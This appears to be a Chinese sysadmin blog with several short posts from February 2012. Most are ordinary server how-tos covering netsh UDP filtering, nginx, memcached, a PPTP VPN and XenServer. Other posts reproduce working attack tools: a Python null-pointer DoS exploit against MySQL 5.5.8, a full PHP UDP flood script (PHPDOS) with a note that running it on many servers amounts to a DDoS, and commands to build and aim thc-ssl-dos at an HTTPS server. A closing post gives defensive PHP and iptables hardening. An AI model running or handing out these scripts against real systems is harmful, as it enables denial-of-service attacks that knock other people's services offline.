2012年2月8日 | 标签: ,

原文来自http://www.exploit-db.com/exploits/18269/
攻击源码
import socket, sys

print “n”
print “—————————————————————-”
print “| MySQL 5.5.8 Null Ptr (windows) |”
print “| Level Smash the Stack |”
print “—————————————————————-”
print “n”

buf=(“&x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00″
“x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00″)

buf2=(“x11x00x00x00x03set autocommit30″)

def usage():
print “usage : ./mysql.py <victim_ip>”
print “example: ./mysql.py 192.168.1.22″

def main():
if len(sys.argv) != 2:
usage()
sys.exit()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

HOST = sys.argv[1]
PORT = int(3306)
s.connect((HOST,PORT))
print “[*] Connect”
s.send(buf)
print “[*] Payload 1 sent”
s.send(buf2)
print “[*] Payload 2 sentn”, “[*] Run again to ensure it is down..n”
s.close()

if __name__ == “__main__”:
main()

2012年2月8日 | 标签: ,

新建 一个bat文件,复制如下内容到bat文件中,将文件名命名为drop-udp.bat
netsh ipsec static add policy name=dropudp
netsh ipsec static add filterlist name=allow-udp
netsh ipsec static add filterlist name=drop-udp

REM 添加筛选器到IP筛选器列表(允许上网)
netsh ipsec static add filter filterlist=allow-udp srcaddr=me dstaddr=any description=dns访问 protocol=udp mirrored=yes dstport=53
netsh ipsec static add filter filterlist=allow-udp srcaddr=me dstaddr=any description=dns访问 protocol=udp mirrored=yes dstport=123
netsh ipsec static add filter filterlist=allow-udp srcaddr=me dstaddr=any description=dns访问 protocol=udp mirrored=yes dstport=161

REM 添加筛选器到IP筛选器列表(不让别人访问)
netsh ipsec static add filter filterlist=drop-udp srcaddr=any dstaddr=me description=别人到我任何访问 protocol=udp mirrored=yes

REM 添加筛选器操作
netsh ipsec static add filteraction name=allow-udp-port action=permit
netsh ipsec static add filteraction name=drop-udp-port action=block

REM 创建一个链接指定 IPSec 策略、筛选器列表和筛选器操作的规则(加入规则到我的安全策略)
netsh ipsec static add rule name=允许规则 policy=dropudp filterlist=allow-udp filteraction=allow-udp-port
netsh ipsec static add rule name=拒绝规则 policy=dropudp filterlist=drop-udp filteraction=drop-udp-port

REM 激活我的安全策略
netsh ipsec static set policy name=dropudp assign=y

保存后,双击运行即可
udp除53 DNS解析,161 snmp监控端口 及时间同步服务123这三个udp的端口外,禁用所有udp出入站连接

2012年2月8日 | 标签:

非常简易在location ~ .php下加入如可字段即可

fastcgi_split_path_info ^((?U).+.php)(/?.+)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_param PATH_TRANSLATED $document_root$fastcgi_path_info;

重启nginx即可

2012年2月8日 | 标签:

Tom版广告太多,最好不要下载tom版。
skype的国际版下载:
http://download.skype.com/SkypeSetupFull.exe
这个地址永远是最新正式版

2012年2月8日 | 标签: ,

软件下载
wget http://memcached.googlecode.com/files/memcached-1.4.10.tar.gz
软件安装
./configure –prefix=/usr/local/memcached –disable-docs –enable-64bit
make -j 4
make install
启动服务端(默认监听tcp及udp 11211端口)
/usr/local/memcached/bin/memcached -u nobody -d

Web服务器上使用
安装Memcache的PHP扩展
在http://pecl.php.net/package/memcache 选择相应想要下载的memcache版本。
安装PHP的memcache扩展
tar vxzf memcache-2.2.1.tgz
cd memcache-2.2.1
/usr/local/php/bin/phpize
./configure –enable-memcache –with-php-config=/usr/local/php/bin/php-config –with-zlib-dir
make
make install
上述安装完后会有类似这样的提示:
Installing shared extensions: /usr/local/php/lib/php/extensions/no-debug-non-zts-2007xxxx/
php.ini中加入
[memcache]
extension_dir = “/usr/local/php/lib/php/extensions/no-debug-non-zts-2007xxxx/”
extension = “memcache.so”

修改php.ini将session.save_handler=files 改成
session.save_handler = memcache
session.save_path = “tcp://10.0.0.2:11211″
重加载php即可

2012年2月8日 | 标签: ,

下载软件
wget http://poptop.sourceforge.net/yum/stable/packages/pptpd-1.3.4-2.rhel5.i386.rpm
wget http://poptop.sourceforge.net/yum/stable/packages/ppp-2.4.4-14.1.rhel5.i386.rpm
wget http://poptop.sourceforge.net/yum/stable/packages/ppp-devel-2.4.4-14.1.rhel5.i386.rpm

安装rpm -ivh *.rpm

设置
1./opt/pptpd.conf主文件
option /etc/ppp/options.pptpd
debug
bcrelay eth1
localip 172.16.1.1-10
remoteip 172.16.1.100-200
2./etc/ppp/options.pptpd选项
name pptpd
refuse-pap
refuse-chap
refuse-mschap
require-mschap-v2
require-mppe-128
ms-dns 208.67.220.220
ms-dns 8.8.8.8
ms-dns 208.67.222.222
proxyarp
debug
lock
nobsdcomp
novj
novjccomp
nologfd
lcp-max-configure 100
3./etc/ppp/chap-secrets 用户名和密码
user1 pptpd password *
4.iptables设置
开启ip转发
修改/etc/sysctl.conf为如下值
net.ipv4.ip_forward = 1
设置nat
/sbin/iptables -t nat -A POSTROUTING -s 172.16.1.0/24 -j SNAT –to-source 公网IP

系统日志中/var/log/messages如果出现
pppd is unable to open the /dev/ppp device
执行如下命令即可
mknod /dev/ppp c 108 0

2012年2月8日 | 标签: ,

PHPdos的利用代码

<?php
//=================================================
//PHPDOSv1.8(PossiblyStrongerFloodStrength)
//CodedbyEXE
//=================================================

$packets=0;
$ip=$_POST['ip'];
$rand=$_POST['port'];
$exec_time=$_POST['time'];
set_time_limit(0);
ignore_user_abort(FALSE);
$time=time();
print”Flooded:$iponport$rand<br><br>”;
$max_time=$time+$exec_time;

for($i=0;$i<65535;$i++){
$out.=”X”;
}
while(1){
$packets++;
if(time()>$max_time){
break;
}

$fp=fsockopen("udp://$ip",$rand,$errno,$errstr,5);
if($fp){
fwrite($fp,$out);
fclose($fp);
}
}
echo"Packetcompleteat".time('h:i:s')."with$packets(".round(($packets*65)/1024,2)."mB)packetsaveraging".round($packets/$exec_time,2)."packets/sn";
?>

关键代码在于 $fp = fsockopen(“udp://$ip”, $rand, $errno, $errstr, 5);
方法很简单,向目标主机发送UDP包,在加上定义无限死循环,就会形成较大的压力。
这个压力是对于执行这个脚本的服务器来说的,因为它首先对自身的网宽、CPU等资源造成大量占用。
如果想用这个脚本对目标站点形成压力,需要在多个服务器上执行该脚本,DDOS嘛。

如何应对?
首先常见的就是禁用fsockopen以及pfsockopen函数

2012年2月8日 | 标签:

德国黑客10月24日发布了攻击工具,详情请参考 http://www.thc.org/thc-ssl-dos/
可以攻击到 https/smtps/pops 等等 ,目前还没有比较好的解决方法
No real solutions exists. The following steps can mitigate (but not solve) the problem:
1. Disable SSL-Renegotiation
2. Invest into SSL Accelerator

攻击软件安装使用
wget http://www.thc.org/thc-ssl-dos/thc-ssl-dos-1.4.tar.gz
tar xf thc-ssl-dos-1.4.tar.gz
cd thc-ssl-dos-1.4
./configure && make
使用
src/thc-ssl-dos –accept 192.168.0.1 443

我测试了下,内网环境,10分钟 服务器https 服务器失出反应

2012年2月8日 | 标签: ,

目前很多的DDoS攻击者,一般是通过php挂马,利用php shell发包,然后执行ddos攻击。成本非常低价,有人说根我说,控制上千服务器发包一个ddos系统,花几百块就可以搞掂,压了一下我的一台G口的美国服务器,基本是秒杀 ……. 哭,现在这网络情况,唉
闲话了…….

以下教您通过改变一些linux服务器及php的安全的设置,来禁止挂马后成为ddos攻击源
1.php.ini禁掉php调用系统的exec之类的参数
在php.ini中加入如下一行
disable_functions=symlink,shell_exec,exec,proc_close,proc_open,popen,system,dl,passthru,escapeshellarg,escapeshellcmd
2.禁止服务器的ouput发udp包(除本机设置的域名解析服务器)
#!/bash/bash
NSIP=`cat /etc/resolv.conf |grep nameserver |awk ‘NR==1{print $2 }’`
/sbin/iptables -A OUTPUT -p udp -j DROP
/sbin/iptables -I OUTPUT -p udp –dport 53 -d $NSIP -j ACCEPT

2012年2月8日 | 标签: ,

XenServer是一套已在云计算环境中经过验证免费的企业级开放式服务器虚拟化解决方案,可以将静态、复杂的IT环境转变为更加动态、易于管理的虚拟数据中心,从而大大降低数据中心成本。同时,它可以提供先进的管理功能,实现虚拟数据中心的集成和自动化,而成本远远低于其它解决方案。
XenServer是一种完整的虚拟基础架构解决方案,包括具有实时迁移功能的64位系统管理程序、功能全面的管理控制台,以及将应用、桌面和服务器从物理环境迁移到虚拟环境所需的各种工具。XenServer允许企业创建和管理数量无限的服务器和虚拟机,而且可以从同一管理控制台上安全运行。如果客户需要更高级的管理功能、可用性、集成功能或自动化功能,只需升级到高级版本的 XenServer,即可创造一个增强型的虚拟数据中心。高级版、企业版和铂金版XenServer产品具有丰富的管理和自动化功能,能够提供全面的数据中心自动化、高级集成和管理,以及关键的性能特性。XenServer基于Xen开源设计,是一种具有出色可靠性、可用性和安全性的虚拟化平台,能够提供与本地应用不相上下的性能和无与伦比的虚拟机密度。XenServer允许通过一个直观的向导驱动工具轻松完成服务器、存储和网络设置,真正实现 “Ten Minutes to Xen(10分钟实现虚拟化)”的目标。

发行说明

http://support.citrix.com/article/CTX130418

下载地址
http://downloadns.citrix.com.edgesuite.net/akdlm/6174/XenServer-6.0.0-install-cd.iso